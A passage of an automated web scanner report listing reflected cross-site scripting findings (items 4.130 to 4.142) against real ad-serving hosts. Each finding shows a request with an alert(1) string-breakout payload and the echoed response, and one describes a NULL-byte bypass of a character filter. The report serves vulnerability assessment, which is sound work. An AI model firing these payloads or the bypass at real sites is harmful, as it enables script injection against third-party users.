The value of the sid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d9db7'-alert(1)-'c5b33736d34 was submitted in the sid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N763.Valueclick/B5189085.13;sz=300x250;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=278313&mid=519438&m=6&sid=54393d9db7'-alert(1)-'c5b33736d34&c=0&tp=8&forced_click=;ord=20110128230424?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 496
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:21 GMT
Expires: Sat, 29 Jan 2011 05:20:21 GMT
Connection: close

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3a9e/c/7e/%2a/q;235157859;1-0;0;59025920;4307-300/250;40327153/40344940/1;;~okv=;pc=[TPAS_ID];;~sscs=%3fhttp://media.fastclick.net/w/click.here?cid=278313&mid=519438&m=6&sid=54393d9db7'-alert(1)-'c5b33736d34&c=0&tp=8&forced_click=http%3a%2f%2finstoresnow.walmart.com/enhancedrendercontent_ektid92667.aspx">
...[SNIP]...

4.130. http://ad.doubleclick.net/adj/N763.Valueclick/B5189085.13 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N763.Valueclick/B5189085.13

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 158a9'-alert(1)-'deb9cc6efed was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N763.Valueclick/B5189085.13;sz=300x250;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=278313158a9'-alert(1)-'deb9cc6efed&mid=519438&m=6&sid=54393&c=0&tp=8&forced_click=;ord=20110128230424?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6241
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:13 GMT
Expires: Sat, 29 Jan 2011 05:20:13 GMT
Connection: close

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Jan 27 15:58:11 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
k%3Bh%3Dv8/3a9e/f/7e/%2a/l%3B235157859%3B0-0%3B0%3B59025920%3B4307-300/250%3B40327107/40344894/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=278313158a9'-alert(1)-'deb9cc6efed&mid=519438&m=6&sid=54393&c=0&tp=8&forced_click=http%3a%2f%2finstoresnow.walmart.com/enhancedrendercontent_ektid92667.aspx\">
...[SNIP]...

4.131. http://ad.doubleclick.net/adj/N763.Valueclick/B5189085.13 [tp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N763.Valueclick/B5189085.13

Issue detail

The value of the tp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00a5648"-alert(1)-"e253305c7e0 was submitted in the tp parameter. This input was echoed as a5648"-alert(1)-"e253305c7e0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /adj/N763.Valueclick/B5189085.13;sz=300x250;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=278313&mid=519438&m=6&sid=54393&c=0&tp=8%00a5648"-alert(1)-"e253305c7e0&forced_click=;ord=20110128230424?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6235
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:23 GMT
Expires: Sat, 29 Jan 2011 05:20:23 GMT
Connection: close

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Jan 27 15:58:11 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
9%3B0-0%3B0%3B59025920%3B4307-300/250%3B40327107/40344894/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=278313&mid=519438&m=6&sid=54393&c=0&tp=8%00a5648"-alert(1)-"e253305c7e0&forced_click=http://instoresnow.walmart.com/enhancedrendercontent_ektid92667.aspx");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess
...[SNIP]...

4.132. http://ad.doubleclick.net/adj/N763.Valueclick/B5189085.13 [tp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N763.Valueclick/B5189085.13

Issue detail

The value of the tp request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e4b0'-alert(1)-'02f22d66f55 was submitted in the tp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N763.Valueclick/B5189085.13;sz=300x250;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=278313&mid=519438&m=6&sid=54393&c=0&tp=89e4b0'-alert(1)-'02f22d66f55&forced_click=;ord=20110128230424?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6241
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:24 GMT
Expires: Sat, 29 Jan 2011 05:20:24 GMT
Connection: close

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Jan 27 15:58:11 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
7859%3B0-0%3B0%3B59025920%3B4307-300/250%3B40327107/40344894/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=278313&mid=519438&m=6&sid=54393&c=0&tp=89e4b0'-alert(1)-'02f22d66f55&forced_click=http%3a%2f%2finstoresnow.walmart.com/enhancedrendercontent_ektid92667.aspx\">
...[SNIP]...

4.133. http://ad.doubleclick.net/adj/cm.rev_bostonherald/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/cm.rev_bostonherald/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 19073'-alert(1)-'0b09bb6dee0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.rev_bostonherald/?19073'-alert(1)-'0b09bb6dee0=1 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 350
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:02 GMT
Expires: Sat, 29 Jan 2011 05:20:02 GMT
Connection: close

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3a9e/0/0/%2a/w;235520565;0-0;0;44779888;255-0/0;40442340/40460127/1;;~okv=;19073'-alert(1)-'0b09bb6dee0=1;~aopt=2/0/ef/0;~sscs=%3fhttp://www.ntta.org/">
...[SNIP]...

4.134. http://ad.doubleclick.net.57389.9231.302br.net/jsi/adi/N4682.132309.BURSTMEDIA/B4421704.7 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net.57389.9231.302br.net
Path:   /jsi/adi/N4682.132309.BURSTMEDIA/B4421704.7

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9cc84"-alert(1)-"f176a4fef5c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jsi/adi9cc84"-alert(1)-"f176a4fef5c/N4682.132309.BURSTMEDIA/B4421704.7;sz=300x250;click=http://www.burstnet.com/ads/ad19083a-map.cgi/BCPG174597.252798.300824/VTS=29iU7.jjkA/SZ=300X250A/V=2.3S//REDIRURL=;ord=3925? HTTP/1.1
Host: ad.doubleclick.net.57389.9231.302br.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=342128F502247A5E0A2B3E23143AA362; Path=/
Content-Type: text/html
Content-Length: 7197
Date: Sat, 29 Jan 2011 01:55:07 GMT
Connection: close

<html>
<head></head>
<body>
<script type="text/javascript"><!--

var adsafeVisParams = {
   mode : "jsi",
   jsref : "http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome",
   adsafeSrc : "http://ad.doubleclick.net.57389.9231.302br.net/fw/adi9cc84"-alert(1)-"f176a4fef5c/N4682.132309.BURSTMEDIA/B4421704.7;sz=300x250;click=http://www.burstnet.com/ads/ad19083a-map.cgi/BCPG174597.252798.300824/VTS=29iU7.jjkA/SZ=300X250A/V=2.3S//REDIRURL=;ord=3925",
   adsafeSep : "?",
   req
...[SNIP]...

4.135. http://ad.doubleclick.net.57389.9231.302br.net/jsi/adi/N4682.132309.BURSTMEDIA/B4421704.7 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net.57389.9231.302br.net
Path:   /jsi/adi/N4682.132309.BURSTMEDIA/B4421704.7

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a5ce1"-alert(1)-"42b69e5e783 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jsi/adi/N4682.132309.BURSTMEDIAa5ce1"-alert(1)-"42b69e5e783/B4421704.7;sz=300x250;click=http://www.burstnet.com/ads/ad19083a-map.cgi/BCPG174597.252798.300824/VTS=29iU7.jjkA/SZ=300X250A/V=2.3S//REDIRURL=;ord=3925? HTTP/1.1
Host: ad.doubleclick.net.57389.9231.302br.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=A1FD6EEE9A8663932F7BDCC831DC7153; Path=/
Content-Type: text/html
Content-Length: 7197
Date: Sat, 29 Jan 2011 01:55:08 GMT
Connection: close

<html>
<head></head>
<body>
<script type="text/javascript"><!--

var adsafeVisParams = {
   mode : "jsi",
   jsref : "http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome",
   adsafeSrc : "http://ad.doubleclick.net.57389.9231.302br.net/fw/adi/N4682.132309.BURSTMEDIAa5ce1"-alert(1)-"42b69e5e783/B4421704.7;sz=300x250;click=http://www.burstnet.com/ads/ad19083a-map.cgi/BCPG174597.252798.300824/VTS=29iU7.jjkA/SZ=300X250A/V=2.3S//REDIRURL=;ord=3925",
   adsafeSep : "?",
   requrl : "",
   reqquery : ""
...[SNIP]...

4.136. http://ad.doubleclick.net.57389.9231.302br.net/jsi/adi/N4682.132309.BURSTMEDIA/B4421704.7 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net.57389.9231.302br.net
Path:   /jsi/adi/N4682.132309.BURSTMEDIA/B4421704.7

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a0ee1"-alert(1)-"bd76f740cf was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jsi/adi/N4682.132309.BURSTMEDIA/B4421704.7a0ee1"-alert(1)-"bd76f740cf;sz=300x250;click=http://www.burstnet.com/ads/ad19083a-map.cgi/BCPG174597.252798.300824/VTS=29iU7.jjkA/SZ=300X250A/V=2.3S//REDIRURL=;ord=3925? HTTP/1.1
Host: ad.doubleclick.net.57389.9231.302br.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=9F66F5B713694023D3CE9D57322BE3AC; Path=/
Content-Type: text/html
Content-Length: 7196
Date: Sat, 29 Jan 2011 01:55:08 GMT
Connection: close

<html>
<head></head>
<body>
<script type="text/javascript"><!--

var adsafeVisParams = {
   mode : "jsi",
   jsref : "http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome",
   adsafeSrc : "http://ad.doubleclick.net.57389.9231.302br.net/fw/adi/N4682.132309.BURSTMEDIA/B4421704.7a0ee1"-alert(1)-"bd76f740cf;sz=300x250;click=http://www.burstnet.com/ads/ad19083a-map.cgi/BCPG174597.252798.300824/VTS=29iU7.jjkA/SZ=300X250A/V=2.3S//REDIRURL=;ord=3925",
   adsafeSep : "?",
   requrl : "",
   reqquery : "",
   debug :
...[SNIP]...

4.137. http://ad.doubleclick.net.57389.9231.302br.net/jsi/adi/N4682.132309.BURSTMEDIA/B4421704.7 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net.57389.9231.302br.net
Path:   /jsi/adi/N4682.132309.BURSTMEDIA/B4421704.7

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 11090"-alert(1)-"5cd4535793b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jsi/adi/N4682.132309.BURSTMEDIA/B4421704.7;sz=300x250;click=http://www.burstnet.com/ads/ad19083a-map.cgi/BCPG174597.252798.300824/VTS=29iU7.jjkA/SZ=300X250A/V=2.3S//REDIRURL=;ord=3925?&11090"-alert(1)-"5cd4535793b=1 HTTP/1.1
Host: ad.doubleclick.net.57389.9231.302br.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=5127D245BC3250ACF31540E5AF36C9C9; Path=/
Content-Type: text/html
Content-Length: 7201
Date: Sat, 29 Jan 2011 01:55:06 GMT
Connection: close

<html>
<head></head>
<body>
<script type="text/javascript"><!--

var adsafeVisParams = {
   mode : "jsi",
   jsref : "http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Midd
...[SNIP]...
9.9231.302br.net/fw/adi/N4682.132309.BURSTMEDIA/B4421704.7;sz=300x250;click=http://www.burstnet.com/ads/ad19083a-map.cgi/BCPG174597.252798.300824/VTS=29iU7.jjkA/SZ=300X250A/V=2.3S//REDIRURL=;ord=3925?&11090"-alert(1)-"5cd4535793b=1",
   adsafeSep : "&",
   requrl : "",
   reqquery : "",
   debug : "false"
};


// use closure to keep out of global namespace
(function() {

   /* ============================ UTILITIES (LOGGING) ===========
...[SNIP]...

4.138. http://ad.doubleclick.net.57389.9231.302br.net/jsi/adi/N4682.132309.BURSTMEDIA/B4421704.7 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net.57389.9231.302br.net
Path:   /jsi/adi/N4682.132309.BURSTMEDIA/B4421704.7

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload facb6"-alert(1)-"b1f9c18d965 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jsi/adi/N4682.132309.BURSTMEDIA/B4421704.7;sz=300x250;click=http://www.burstnet.com/ads/ad19083a-map.cgi/BCPG174597.252798.300824/VTS=29iU7.jjkA/SZ=300X250A/V=2.3S//REDIRURL=;ord=3925?facb6"-alert(1)-"b1f9c18d965 HTTP/1.1
Host: ad.doubleclick.net.57389.9231.302br.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=CBEEFDB089EB7BC4DEF5E5E91E7C4697; Path=/
Content-Type: text/html
Content-Length: 7198
Date: Sat, 29 Jan 2011 01:55:06 GMT
Connection: close

<html>
<head></head>
<body>
<script type="text/javascript"><!--

var adsafeVisParams = {
   mode : "jsi",
   jsref : "http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Midd
...[SNIP]...
89.9231.302br.net/fw/adi/N4682.132309.BURSTMEDIA/B4421704.7;sz=300x250;click=http://www.burstnet.com/ads/ad19083a-map.cgi/BCPG174597.252798.300824/VTS=29iU7.jjkA/SZ=300X250A/V=2.3S//REDIRURL=;ord=3925?facb6"-alert(1)-"b1f9c18d965",
   adsafeSep : "&",
   requrl : "",
   reqquery : "",
   debug : "false"
};


// use closure to keep out of global namespace
(function() {

   /* ============================ UTILITIES (LOGGING) =============
...[SNIP]...

4.139. http://ad.doubleclick.net.57390.9231.302br.net/jss/adj/N4682.132309.BURSTMEDIA/B4421704.7 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net.57390.9231.302br.net
Path:   /jss/adj/N4682.132309.BURSTMEDIA/B4421704.7

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c5169"-alert(1)-"6db9eb136ba was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jss/adjc5169"-alert(1)-"6db9eb136ba/N4682.132309.BURSTMEDIA/B4421704.7 HTTP/1.1
Host: ad.doubleclick.net.57390.9231.302br.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=52485E91EC42E968E3BD3A7776779500; Path=/
Content-Type: text/javascript
Content-Length: 6820
Date: Sat, 29 Jan 2011 05:20:30 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "null",
   adsafeSrc : "http://ad.doubleclick.net.57390.9231.302br.net/fw/adjc5169"-alert(1)-"6db9eb136ba/N4682.132309.BURSTMEDIA/B4421704.7",
   adsafeSep : "?",
   requrl : "",
   reqquery : "",
   debug : "false"
};


// use closure to keep out of global namespace
(function() {

   /* ===========================
...[SNIP]...

4.140. http://ad.doubleclick.net.57390.9231.302br.net/jss/adj/N4682.132309.BURSTMEDIA/B4421704.7 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net.57390.9231.302br.net
Path:   /jss/adj/N4682.132309.BURSTMEDIA/B4421704.7

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 88a12"-alert(1)-"4fefc518825 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jss/adj/N4682.132309.BURSTMEDIA88a12"-alert(1)-"4fefc518825/B4421704.7 HTTP/1.1
Host: ad.doubleclick.net.57390.9231.302br.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=7D54379AD5454BE506B7140F745360AC; Path=/
Content-Type: text/javascript
Content-Length: 6820
Date: Sat, 29 Jan 2011 05:20:31 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "null",
   adsafeSrc : "http://ad.doubleclick.net.57390.9231.302br.net/fw/adj/N4682.132309.BURSTMEDIA88a12"-alert(1)-"4fefc518825/B4421704.7",
   adsafeSep : "?",
   requrl : "",
   reqquery : "",
   debug : "false"
};


// use closure to keep out of global namespace
(function() {

   /* ============================ UTILITIES (LOGGING) ==
...[SNIP]...

4.141. http://ad.doubleclick.net.57390.9231.302br.net/jss/adj/N4682.132309.BURSTMEDIA/B4421704.7 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net.57390.9231.302br.net
Path:   /jss/adj/N4682.132309.BURSTMEDIA/B4421704.7

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2e5d1"-alert(1)-"6727e37c905 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jss/adj/N4682.132309.BURSTMEDIA/B4421704.72e5d1"-alert(1)-"6727e37c905 HTTP/1.1
Host: ad.doubleclick.net.57390.9231.302br.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=6C3A37B834F620543E1586EF494A62CC; Path=/
Content-Type: text/javascript
Content-Length: 6820
Date: Sat, 29 Jan 2011 05:20:31 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "null",
   adsafeSrc : "http://ad.doubleclick.net.57390.9231.302br.net/fw/adj/N4682.132309.BURSTMEDIA/B4421704.72e5d1"-alert(1)-"6727e37c905",
   adsafeSep : "?",
   requrl : "",
   reqquery : "",
   debug : "false"
};


// use closure to keep out of global namespace
(function() {

   /* ============================ UTILITIES (LOGGING) =============
...[SNIP]...

4.142. http://ad.doubleclick.net.57390.9231.302br.net/jss/adj/N4682.132309.BURSTMEDIA/B4421704.7 [abr parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net.57390.9231.302br.net
Path:   /jss/adj/N4682.132309.BURSTMEDIA/B4421704.7

Issue detail

The value of the abr request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dc3cc"-alert(1)-"89837e3663b was submitted in the abr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jss/adj/N4682.132309.BURSTMEDIA/B4421704.7;abr=!ie;sz=300x250;click=http://www.burstnet.com/ads/ad19083a-map.cgi/BCPG174597.252798.300824/VTS=29iU7.jjkA/SZ=300X250A/V=2.3S//REDIRURL=;ord=3925?dc3cc"-alert(1)-"89837e3663b HTTP/1.1
Host: ad.doubleclick.net.57390.9231.302br.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=CB04512BF419206D1DEA473C1878274B; Path=/
Content-Type: text/javascript
Content-Length: 6970
Date: Sat, 29 Jan 2011 05:20:27 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "null",
